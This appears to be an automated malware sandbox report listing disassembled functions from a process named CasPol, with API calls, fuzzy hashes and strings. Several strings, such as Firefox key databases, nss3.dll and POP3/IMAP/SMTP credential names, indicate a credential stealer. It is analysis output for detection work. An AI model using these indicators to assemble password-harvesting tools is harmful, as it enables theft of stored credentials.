                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                                                    • API String ID: 643879872-978417875
                                                                                                                                                                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                                                                                    • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                                                    • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                    • API String ID: 524865279-2190619648
                                                                                                                                                                                                                    • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                    • String ID: key3.db$key4.db
                                                                                                                                                                                                                    • API String ID: 581844971-3557030128
                                                                                                                                                                                                                    • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                                                    • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 125969286-791839006
                                                                                                                                                                                                                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                    • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                    • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                    • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                    • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                    • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                    • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                    • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                    • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                      • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemcpy
                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                    • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                    • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                    • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                                                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                                                    • Opcode ID: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                                                    • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
